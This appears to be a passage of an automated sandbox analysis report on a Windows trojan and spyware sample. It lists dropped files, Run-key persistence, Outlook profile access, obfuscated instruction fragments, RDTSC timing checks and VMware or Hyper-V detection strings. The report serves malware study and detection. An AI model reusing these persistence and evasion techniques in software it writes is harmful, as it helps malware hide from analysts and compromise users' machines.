Source: C:\Users\user\Desktop\TR0627729920002.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Jwjxmakrvkwfuijrnbpqlslhsyeopao[1] Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\P1bxx Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@23/8@36/13
Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3436:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4968:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01
Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
Source: Binary string: wntdll.pdb source: cmd.exe, cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmd.pdb source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035B8007 push sp; iretd 0_3_035B8009
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF45C pushad ; retf 0_3_035CF460
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF45C pushad ; retf 0_3_035CF460
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0059 pushad ; retf 0_3_035D005A
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0059 pushad ; retf 0_3_035D005A
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0059 pushad ; retf 0_3_035D005A
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0452 pushad ; retf 0_3_035D0458
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0452 pushad ; retf 0_3_035D0458
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0452 pushad ; retf 0_3_035D0458
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF145 pushfd ; retf 0_3_035CF147
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF145 pushfd ; retf 0_3_035CF147
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF37A pushad ; retf 0_3_035CF37B
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF37A pushad ; retf 0_3_035CF37B
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0773 push FFFFFFD3h; ret 0_3_035D0782
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0773 push FFFFFFD3h; ret 0_3_035D0782
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0773 push FFFFFFD3h; ret 0_3_035D0782
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF416 pushad ; retf 0_3_035CF417
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF416 pushad ; retf 0_3_035CF417
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0012 push esp; retf 0_3_035D0029
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0012 push esp; retf 0_3_035D0029
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D0012 push esp; retf 0_3_035D0029
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF707 pushad ; retf 0_3_035CF73A
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF707 pushad ; retf 0_3_035CF73A
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D083E push FFFFFFBDh; ret 0_3_035D0890
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D083E push FFFFFFBDh; ret 0_3_035D0890
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D083E push FFFFFFBDh; ret 0_3_035D0890
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CFFDD pushad ; retf 0_3_035D0011
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CFFDD pushad ; retf 0_3_035D0011
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF8D7 push esp; ret 0_3_035CF90C
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035CF8D7 push esp; ret 0_3_035CF90C
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D06C5 push ecx; retf 0_3_035D06D5
PE file contains sections with non-standard names
Source: IconCachet0hh.exe.7.dr Static PE information: section name: .didat
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe Jump to dropped file
Source: C:\Users\user\Desktop\TR0627729920002.exe File created: C:\Users\Public\Libraries\Jwjxmakrv.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI
Source: C:\Users\user\Desktop\TR0627729920002.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Jwjxmakrv Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Jwjxmakrv Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Jwjxmakrv Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI
Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 0000000050418C04 second address: 0000000050418C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe RDTSC instruction interceptor: First address: 0000000050418F9E second address: 0000000050418FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000948C04 second address: 0000000000948C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000948F9E second address: 0000000000948FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5744 Thread sleep time: -40000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D083E rdtsc 0_3_035D083E
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\cmd.exe API coverage: 5.0 %
Source: C:\Users\user\Desktop\TR0627729920002.exe Process information queried: ProcessInformation Jump to behavior
Source: explorer.exe, 00000007.00000000.389287152.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 00000007.00000000.318850727.0000000008290000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.374000446.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000007.00000000.281739270.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000007.00000000.360032038.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
Source: explorer.exe, 00000007.00000000.355070759.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
Source: Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.389287152.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\TR0627729920002.exe Code function: 0_3_035D083E rdtsc 0_3_035D083E
Enables debug privileges
Source: C:\Windows\SysWOW64\cmd.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C553CA mov eax, dword ptr fs:[00000030h] 5_2_03C553CA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C553CA mov eax, dword ptr fs:[00000030h] 5_2_03C553CA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h] 5_2_03C003E2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h] 5_2_03C003E2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h] 5_2_03C003E2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h] 5_2_03C003E2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h] 5_2_03C003E2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h] 5_2_03C003E2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE1B8F mov eax, dword ptr fs:[00000030h] 5_2_03BE1B8F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE1B8F mov eax, dword ptr fs:[00000030h] 5_2_03BE1B8F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9138A mov eax, dword ptr fs:[00000030h] 5_2_03C9138A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C8D380 mov ecx, dword ptr fs:[00000030h] 5_2_03C8D380
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0B390 mov eax, dword ptr fs:[00000030h] 5_2_03C0B390
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFDBE9 mov eax, dword ptr fs:[00000030h] 5_2_03BFDBE9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02397 mov eax, dword ptr fs:[00000030h] 5_2_03C02397
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C04BAD mov eax, dword ptr fs:[00000030h] 5_2_03C04BAD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C04BAD mov eax, dword ptr fs:[00000030h] 5_2_03C04BAD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C04BAD mov eax, dword ptr fs:[00000030h] 5_2_03C04BAD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA5BA5 mov eax, dword ptr fs:[00000030h] 5_2_03CA5BA5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA8B58 mov eax, dword ptr fs:[00000030h] 5_2_03CA8B58
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C03B7A mov eax, dword ptr fs:[00000030h] 5_2_03C03B7A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C03B7A mov eax, dword ptr fs:[00000030h] 5_2_03C03B7A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9131B mov eax, dword ptr fs:[00000030h] 5_2_03C9131B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDDB60 mov ecx, dword ptr fs:[00000030h] 5_2_03BDDB60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDF358 mov eax, dword ptr fs:[00000030h] 5_2_03BDF358
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDDB40 mov eax, dword ptr fs:[00000030h] 5_2_03BDDB40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02ACB mov eax, dword ptr fs:[00000030h] 5_2_03C02ACB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEAAB0 mov eax, dword ptr fs:[00000030h] 5_2_03BEAAB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEAAB0 mov eax, dword ptr fs:[00000030h] 5_2_03BEAAB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h] 5_2_03BD52A5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h] 5_2_03BD52A5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h] 5_2_03BD52A5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h] 5_2_03BD52A5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h] 5_2_03BD52A5
